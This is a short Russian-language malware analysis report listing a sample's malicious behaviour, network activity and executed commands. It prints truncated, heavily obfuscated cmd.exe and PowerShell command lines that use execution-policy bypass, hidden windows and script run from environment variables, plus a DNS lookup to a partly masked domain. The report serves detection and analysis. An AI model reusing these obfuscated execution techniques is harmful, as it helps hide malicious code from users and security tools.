Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "seT xOtw= sEt-vaRIABlE 387n ([TYpE]("{0}{3}{2}{1}" -f 'E','nT','mE','nviRoN') ); do{^&("{1}{0}" -f 'p','slee') 41;${Om`Es} = (ls VArIable:387N ).VaLuE::('G'+'etF'+'old'+'erP'+'ath'...
Сетевая активность
UDP
- DNS ASK ce###dota.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C%CPGft%
- '<SYSTEM32>\cmd.exe' /S /D /c" ecHO (GeT-ItEm VaRIabLE:Ex*Xt).VAlUE.InVoKecOmManD.invoKesCRiPt( (ITeM Env:XOTw).vaLUE)"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noPRo -nONInTeRA -Exe byPaSS -nOLO -WINDO Hidden ${inpUT}| & ((VAriAbLe '*MDr*').Name[3,11,2]-jOIN'')
- '<SYSTEM32>\cmd.exe' /C "seT xOtw= sEt-vaRIABlE 387n ([TYpE]("{0}{3}{2}{1}" -f 'E','nT','mE','nviRoN') ); do{^&("{1}{0}" -f 'p','slee') 41;${Om`Es} = (ls VArIable:387N ).VaLuE::('G'+'etF'+'old'+'erP'+'ath'... (со скрытым окном)
